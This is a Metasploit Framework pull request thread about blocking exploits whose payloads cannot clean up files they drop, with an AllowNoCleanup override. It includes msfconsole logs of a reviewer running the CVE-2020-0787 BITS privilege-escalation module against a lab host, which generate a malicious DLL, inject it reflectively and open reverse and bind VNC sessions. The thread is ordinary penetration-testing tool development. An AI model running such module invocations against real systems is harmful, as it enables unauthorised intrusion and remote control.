Prevent payloads being used if can't clean up files
rapid7/metasploit-framework pull request #15882
Opened 2021-11-17 06:17 UTC by smashery

This PR stops exploits from running if they will place files on disk, but MSF can't clean them up. This could occur in two ways:

- No session is created
- The session does not support file deletion

This has been implemented by having sessions indicate whether they support cleanup. In addition, if a payload doesn't specify a handler, or the payload handler is disabled, the logic is triggered.

In all cases, there is a setting on such payloads to allow them to run despite this.

I initially implemented this by blocking it immediately (i.e. when running `set payload`), but that caused more problems later down the track: if `DisablePayloadHandler` is set, that's also a problem. If `AllowNoCleanup` is set to true, but then you try to unset it, do you disallow that? Or reset `payload` and `DisablePayloadHandler` to acceptable values? It just ends up in potentially painful user experience, so it seemed better to just say "The combination of settings you've got is bad" at runtime.

The implementation ignores the `ARTIFACTS_ON_DISK` metadata - it is assumed that if an exploit wants to do cleanup, it will include the `FileDropper` mixin, which actually contains the cleanup logic.

## Verification

- [ ] Start `msfconsole`
- [ ] Select an exploit that uses file dropping (`grep -R Exploit::FileDropper`; e.g. `exchange_proxyshell_rce`).
- [ ] Attempt to use it with various payloads that can generate a session (e.g. `shell` or `meterpreter`) - should succeed
- [ ] Attempt to use it with various payloads that cannot generate a session (e.g. `vncinject`, `hwbridge` or `cmd/platform/generic`) - should fail when attempting to `run`
- [ ] Attempt to use it with `DisablePayloadHandler` set to `true` (should fail)
- [ ] Override these settings by setting `AllowNoCleanup` to `true`
- [ ] Sanity check my settings for which session types can or cannot cleanup

2021-11-24 22:05 UTC, gwillcox-r7 requested changes

2021-11-30 23:14 UTC, smashery commented on lib/msf/base/sessions/mainframe_shell.rb
> +  end
Looking at where the cleanup actually occurs - at https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/file_dropper.rb#L189-L257:

- It's not a meterpreter shell, so it'll fall through to the command shell option
- The mainframe shell would need to respond to either `rm` (more likely), or `attrib.exe`, `del` and `rd`

I think I initially misread the Z/OS documentation when setting that to `false`, but https://github.com/rapid7/metasploit-framework/pull/6292 seems to show it as a bash shell; so maybe it would be fine.

I wonder if @bigendiansmalls would be able to provide advice?

2021-11-30 23:34 UTC, smashery commented on lib/msf/core/payload/pingback.rb
> -    self
By removing the `self.can_cleanup = false` line, the only remaining code would be an empty constructor, which just passes up to its superclass.

2021-12-01 00:14 UTC, smashery commented
@msjenkins-r7 test this please.

2021-12-01 15:31 UTC, gwillcox-r7 commented on lib/msf/core/payload/pingback.rb
> -    self
Fair point, I'll mark this as resolved then.

2021-12-11 12:47 UTC, sempervictus commented on lib/msf/core/exploit.rb
> -    if self.needs_cleanup && !pi.can_cleanup
I'd suggest leaving this as a stub to trip a `print_error` if the method is called - i could see this being hit by plugins or modules/rc files for folks with out-of-tree stuff.

2021-12-12 23:42 UTC, gwillcox-r7 commented on lib/msf/base/sessions/mainframe_shell.rb
> +  end
Given there is no update here I'm tempted to leave this as to be on the safe side given previous discussions I've had with the team and then change this if needed in case we run into errors.

2021-12-12 23:45 UTC, gwillcox-r7 commented on lib/msf/core/exploit.rb
> -    if self.needs_cleanup && !pi.can_cleanup
So keep this the same so that calling code that may use this to determine if `print_error` should be run can do so? Just trying to clarify your wording here.

2021-12-13 04:08 UTC, sempervictus commented on lib/msf/core/exploit.rb
> -    if self.needs_cleanup && !pi.can_cleanup
Basically replacing the `return false` with `print_error("Payload requires cleanup and the module either cannot perform or guarantee this function")` or something to that effect.

2021-12-13 15:50 UTC, gwillcox-r7 commented on lib/msf/core/exploit.rb
> -    if self.needs_cleanup && !pi.can_cleanup
Actually on second examination this has to be removed due to the fact that `lib/msf/core/payload.rb` no longer has the `can_cleanup` accessor, and that this logic has now been moved into `lib/msf/core/exploit_driver.rb` on line 94 and 95 of the change (see https://github.com/rapid7/metasploit-framework/pull/15882/files/0a2780027ee1a20885722f63a581f158af77a74e#diff-07dc4dfe4f1eba11aba1bd72d8569b216af203cdb934a144988573ed62bb8c9dR94-R95).

Therefore I think the current changes are fine as they are, otherwise we will end up breaking functionality.

2021-12-13 15:57 UTC, gwillcox-r7 commented on lib/msf/core/exploit.rb
> -    if self.needs_cleanup && !pi.can_cleanup
Further discussions over Slack clarified that we are both on the same page r.e this so going to mark this as resolved.

2021-12-13 15:59 UTC, gwillcox-r7 commented on lib/msf/base/sessions/mainframe_shell.rb
> +  end
Leaving this open in case people have any input on this down the line and for future travelers, however going to land this in its current state for now given I think that is the best way to do things given the current info we have.

2021-12-13 16:16 UTC, gwillcox-r7 approved these changes

2021-12-16 19:23 UTC, gwillcox-r7 commented
Currently testing this with  CVE-2020-0787 but I'm getting infinite shells being opened, going to try again on master and see if this is a one off error or something else but something may be going odd here.

2021-12-16 19:25 UTC, gwillcox-r7 commented
Okay yeah this isn't happening in `master`, trying again one more time with your branch to see if its a one off error or not.

2021-12-16 20:40 UTC, gwillcox-r7 commented
Running with `DisablePayloadHandler` set to `true` will allow `run` to operate however no shell will be returned. Not sure if this is what you were after but seems appropriate.

2021-12-16 20:47 UTC, gwillcox-r7 commented
Attempt to use it with various payloads that cannot generate a session (e.g. vncinject, hwbridge or cmd/platform/generic) - should fail when attempting to run <- This is still working for me, am I do something wrong?

```
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set PAYLOAD windows/x64/vncinject/reverse_tcp
PAYLOAD => windows/x64/vncinject/reverse_tcp
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options

Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   JOB_WAIT_TIME  20               yes       Time to wait for the BITS job to complete be
                                             fore starting the USO service to execute the
                                              uploaded payload, in seconds
   OVERWRITE_DLL  false            yes       Overwrite WindowsCoreDeviceInfo.dll if it ex
                                             ists (false by default).
   SESSION        170              yes       The session to run this module on


Payload options (windows/x64/vncinject/reverse_tcp):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   AUTOVNC               true             yes       Automatically launch VNC viewer if pr
                                                    esent
   DisableCourtesyShell  true             no        Disables the Metasploit Courtesy shel
                                                    l
   EXITFUNC              thread           yes       Exit technique (Accepted: '', seh, th
                                                    read, process, none)
   LHOST                 172.30.43.183    yes       The listen address (an interface may
                                                    be specified)
   LPORT                 8832             yes       The listen port
   VNCHOST               127.0.0.1        yes       The local host to use for the VNC pro
                                                    xy
   VNCPORT               5900             yes       The local port to use for the VNC pro
                                                    xy
   ViewOnly              true             no        Runs the viewer in view mode


Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper


msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set AllowNoCleanup false
AllowNoCleanup => false
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > run

[*] Started reverse TCP handler on 172.30.43.183:8832 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Step #1: Checking target environment...
[*] Step #2: Generating the malicious DLL...
[*] Payload DLL is 94208 bytes long
[*] Step #3: Loading the exploit DLL to run the main exploit...
[*] Launching netsh to host the DLL...
[+] Process 5052 launched.
[*] Reflectively injecting the DLL into 5052...
[*] Sleeping for 20 seconds to allow the exploit to run...
[*] Starting the interactive scan job...
[*] Enjoy the shell!
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Sending stage (475136 bytes) to 172.30.35.128
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options

Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   JOB_WAIT_TIME  20               yes       Time to wait for the BITS job to complete be
                                             fore starting the USO service to execute the
                                              uploaded payload, in seconds
   OVERWRITE_DLL  false            yes       Overwrite WindowsCoreDeviceInfo.dll if it ex
                                             ists (false by default).
   SESSION        170              yes       The session to run this module on


Payload options (windows/x64/vncinject/reverse_tcp):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   AUTOVNC               true             yes       Automatically launch VNC viewer if pr
                                                    esent
   DisableCourtesyShell  true             no        Disables the Metasploit Courtesy shel
                                                    l
   EXITFUNC              thread           yes       Exit technique (Accepted: '', seh, th
                                                    read, process, none)
   LHOST                 172.30.43.183    yes       The listen address (an interface may
                                                    be specified)
   LPORT                 8832             yes       The listen port
   VNCHOST               127.0.0.1        yes       The local host to use for the VNC pro
                                                    xy
   VNCPORT               5900             yes       The local port to use for the VNC pro
                                                    xy
   ViewOnly              true             no        Runs the viewer in view mode


Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper


msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show advanced

Module advanced options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   AutoCheck             false            no        Run check before exploit
   ContextInformationFi                   no        The information file that contains co
   le                                               ntext information
   DisablePayloadHandle  false            no     [...]

2021-12-16 20:55 UTC, gwillcox-r7 commented
```
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set payload windows/x64/vncinject/bind_tcp
payload => windows/x64/vncinject/bind_tcp
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set AllowNoCleanup false
AllowNoCleanup => false
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options

Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   JOB_WAIT_TIME  20               yes       Time to wait for the BITS job to complete be
                                             fore starting the USO service to execute the
                                              uploaded payload, in seconds
   OVERWRITE_DLL  false            yes       Overwrite WindowsCoreDeviceInfo.dll if it ex
                                             ists (false by default).
   SESSION        1                yes       The session to run this module on


Payload options (windows/x64/vncinject/bind_tcp):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   AUTOVNC               true             yes       Automatically launch VNC viewer if pr
                                                    esent
   DisableCourtesyShell  true             no        Disables the Metasploit Courtesy shel
                                                    l
   EXITFUNC              thread           yes       Exit technique (Accepted: '', seh, th
                                                    read, process, none)
   LPORT                 4444             yes       The listen port
   RHOST                                  no        The target address
   VNCHOST               127.0.0.1        yes       The local host to use for the VNC pro
                                                    xy
   VNCPORT               5900             yes       The local port to use for the VNC pro
                                                    xy
   ViewOnly              true             no        Runs the viewer in view mode


Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper


msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > run

[-] Exploit failed: windows/x64/vncinject/bind_tcp cannot cleanup files created during exploit. To run anyway, set AllowNoCleanup to true
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > 
```
Seems to be working well, sorry for earlier comments ended up accidentally testing on `master` by mistake so deleted those.

2021-12-16 21:03 UTC, gwillcox-r7 commented
After enabling the setting again:

```
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > run

[-] Exploit failed: windows/x64/vncinject/bind_tcp cannot cleanup files created during exploit. To run anyway, set AllowNoCleanup to true
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set AllowNoCleanup true
AllowNoCleanup => true
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running automatic check ("set AutoCheck false" to disable)
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] exploit: Interrupted
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set AutoCheck false
AutoCheck => false
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set RHOST 172.30.35.128
RHOST => 172.30.35.128
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[!] AutoCheck is disabled, proceeding with exploitation
[*] Step #1: Checking target environment...
[*] Step #2: Generating the malicious DLL...
[*] Payload DLL is 94208 bytes long
[*] Step #3: Loading the exploit DLL to run the main exploit...
[*] Launching msiexec to host the DLL...
[+] Process 4696 launched.
[*] Reflectively injecting the DLL into 4696...
[*] Sleeping for 20 seconds to allow the exploit to run...
[*] Starting the interactive scan job...
[*] Enjoy the shell!
[*] Started bind TCP handler against 172.30.35.128:4444
[*] Sending stage (475136 bytes) to 172.30.35.128
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] VNC Server session 2 opened (172.30.43.183:35039 -> 172.30.35.128:4444 ) at 2021-12-16 15:01:52 -0600
[*] Session 2 created in the background.
msf6 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > 
````

Works as expected :)

Will land this now.

2021-12-16 21:06 UTC, merged

2021-12-16 21:07 UTC, gwillcox-r7 commented
# Release Notes
An update has been made which will prevent exploits from running a payload if the exploit drops files onto the target, but the payload doesn't have the capability to clean those dropped files up from the target. Users can still override this setting by specifying `set AllowNoCleanup true` if they wish to bypass this protection.